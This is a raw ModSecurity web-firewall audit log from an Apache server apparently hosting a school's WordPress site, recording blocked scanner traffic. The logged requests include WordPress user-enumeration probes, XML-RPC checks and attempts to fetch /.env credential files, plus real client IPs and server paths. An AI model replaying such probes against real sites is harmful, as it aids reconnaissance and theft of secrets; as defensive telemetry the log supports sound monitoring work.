ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669003831019 5054 (- - -) Stopwatch2: 1746669003831019 5054; combined=3802, p1=463, p2=3124, p3=21, p4=23, p5=98, sr=87, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc123f73-Z-- --47da7273-A-- [08/May/2025:08:50:07 +0700] aBwNz6cs1DvJ_HgMHE_xtwAAAAU 103.236.140.4 42538 103.236.140.4 8181 --47da7273-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47da7273-C-- demo.sayHello --47da7273-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47da7273-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669007454373 5077 (- - -) Stopwatch2: 1746669007454373 5077; combined=3840, p1=441, p2=3192, p3=26, p4=25, p5=91, sr=65, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47da7273-Z-- --d32fd24f-A-- [08/May/2025:08:50:22 +0700] aBwN3qcs1DvJ_HgMHE_xvQAAAAg 103.236.140.4 42556 103.236.140.4 8181 --d32fd24f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d32fd24f-C-- demo.sayHello --d32fd24f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d32fd24f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669022942227 6155 (- - -) Stopwatch2: 1746669022942227 6155; combined=4247, p1=504, p2=3512, p3=33, p4=32, p5=97, sr=71, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d32fd24f-Z-- --58cdab13-A-- [08/May/2025:08:50:41 +0700] aBwN8acs1DvJ_HgMHE_xvwAAABM 103.236.140.4 42560 103.236.140.4 8181 --58cdab13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58cdab13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58cdab13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669041964997 3110 (- - -) Stopwatch2: 1746669041964997 3110; combined=1394, p1=497, p2=866, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58cdab13-Z-- --3b2ba97c-A-- [08/May/2025:08:50:46 +0700] aBwN9is5rYyn3jlLjjK_BAAAANM 103.236.140.4 42566 103.236.140.4 8181 --3b2ba97c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b2ba97c-C-- demo.sayHello --3b2ba97c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b2ba97c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669046865127 5199 (- - -) Stopwatch2: 1746669046865127 5199; combined=3927, p1=519, p2=3193, p3=28, p4=30, p5=93, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b2ba97c-Z-- --098f245f-A-- [08/May/2025:08:50:56 +0700] aBwOAMP9GxxPAbCroFbMvgAAAFc 103.236.140.4 42570 103.236.140.4 8181 --098f245f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 88.220.137.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 88.220.137.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --098f245f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --098f245f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669056885222 2369 (- - -) Stopwatch2: 1746669056885222 2369; combined=1036, p1=341, p2=663, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --098f245f-Z-- --acc1231b-A-- [08/May/2025:08:51:48 +0700] aBwONCs5rYyn3jlLjjK_BQAAAMA 103.236.140.4 42574 103.236.140.4 8181 --acc1231b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --acc1231b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acc1231b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669108439696 2843 (- - -) Stopwatch2: 1746669108439696 2843; combined=1361, p1=441, p2=891, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acc1231b-Z-- --2b00104d-A-- [08/May/2025:08:51:52 +0700] aBwOOKcs1DvJ_HgMHE_xwQAAABY 103.236.140.4 42576 103.236.140.4 8181 --2b00104d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2b00104d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b00104d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669112169523 2898 (- - -) Stopwatch2: 1746669112169523 2898; combined=1310, p1=450, p2=825, p3=0, p4=0, p5=35, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b00104d-Z-- --8a333452-A-- [08/May/2025:08:51:57 +0700] aBwOPY4K347NtBcwXKwFmAAAAIw 103.236.140.4 42582 103.236.140.4 8181 --8a333452-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8a333452-C-- demo.sayHello --8a333452-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a333452-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669117452014 5123 (- - -) Stopwatch2: 1746669117452014 5123; combined=3877, p1=520, p2=3142, p3=23, p4=26, p5=96, sr=123, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a333452-Z-- --81c5845e-A-- [08/May/2025:08:51:58 +0700] aBwOPsP9GxxPAbCroFbMwAAAAFU 103.236.140.4 42586 103.236.140.4 8181 --81c5845e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --81c5845e-C-- demo.sayHello --81c5845e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --81c5845e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669118895529 4812 (- - -) Stopwatch2: 1746669118895529 4812; combined=3753, p1=449, p2=3053, p3=23, p4=27, p5=120, sr=68, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c5845e-Z-- --68c4ea57-A-- [08/May/2025:08:52:16 +0700] aBwOUCs5rYyn3jlLjjK_BwAAAMU 103.236.140.4 42594 103.236.140.4 8181 --68c4ea57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68c4ea57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68c4ea57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669136289361 14888 (- - -) Stopwatch2: 1746669136289361 14888; combined=26391, p1=342, p2=641, p3=0, p4=0, p5=12718, sr=66, sw=0, l=0, gc=12690 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68c4ea57-Z-- --c502cc33-A-- [08/May/2025:08:52:20 +0700] aBwOVCs5rYyn3jlLjjK_CQAAAMs 103.236.140.4 42598 103.236.140.4 8181 --c502cc33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c502cc33-C-- demo.sayHello --c502cc33-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c502cc33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669140887802 5241 (- - -) Stopwatch2: 1746669140887802 5241; combined=3606, p1=496, p2=2928, p3=33, p4=36, p5=69, sr=57, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c502cc33-Z-- --9cf15b47-A-- [08/May/2025:08:57:37 +0700] aBwPkSs5rYyn3jlLjjK_DAAAAMo 103.236.140.4 42618 103.236.140.4 8181 --9cf15b47-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9cf15b47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cf15b47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669457267302 3190 (- - -) Stopwatch2: 1746669457267302 3190; combined=1392, p1=469, p2=891, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cf15b47-Z-- --38f1315f-A-- [08/May/2025:08:57:42 +0700] aBwPlis5rYyn3jlLjjK_DgAAAM8 103.236.140.4 42622 103.236.140.4 8181 --38f1315f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --38f1315f-C-- demo.sayHello --38f1315f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --38f1315f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669462809348 4675 (- - -) Stopwatch2: 1746669462809348 4675; combined=3625, p1=434, p2=2989, p3=24, p4=26, p5=90, sr=64, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38f1315f-Z-- --ec75031c-A-- [08/May/2025:09:09:47 +0700] aBwSa44K347NtBcwXKwFoQAAAIc 103.236.140.4 42730 103.236.140.4 8181 --ec75031c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.204.210.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.204.210.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec75031c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec75031c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746670187580298 2423 (- - -) Stopwatch2: 1746670187580298 2423; combined=1106, p1=380, p2=697, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec75031c-Z-- --62570014-A-- [08/May/2025:09:10:35 +0700] aBwSm8P9GxxPAbCroFbM1QAAAEo 103.236.140.4 42748 103.236.140.4 8181 --62570014-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.56.0.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.56.0.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62570014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62570014-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746670235000340 2716 (- - -) Stopwatch2: 1746670235000340 2716; combined=1443, p1=452, p2=955, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62570014-Z-- --5e04dc18-A-- [08/May/2025:09:11:52 +0700] aBwS6Cs5rYyn3jlLjjK_FQAAAMA 103.236.140.4 42756 103.236.140.4 8181 --5e04dc18-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.75.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.75.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --5e04dc18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e04dc18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746670312242710 778 (- - -) Stopwatch2: 1746670312242710 778; combined=315, p1=275, p2=0, p3=0, p4=0, p5=40, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e04dc18-Z-- --8f514b44-A-- [08/May/2025:09:12:32 +0700] aBwTEMP9GxxPAbCroFbM1gAAAEM 103.236.140.4 42762 103.236.140.4 8181 --8f514b44-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.75.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.75.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --8f514b44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f514b44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 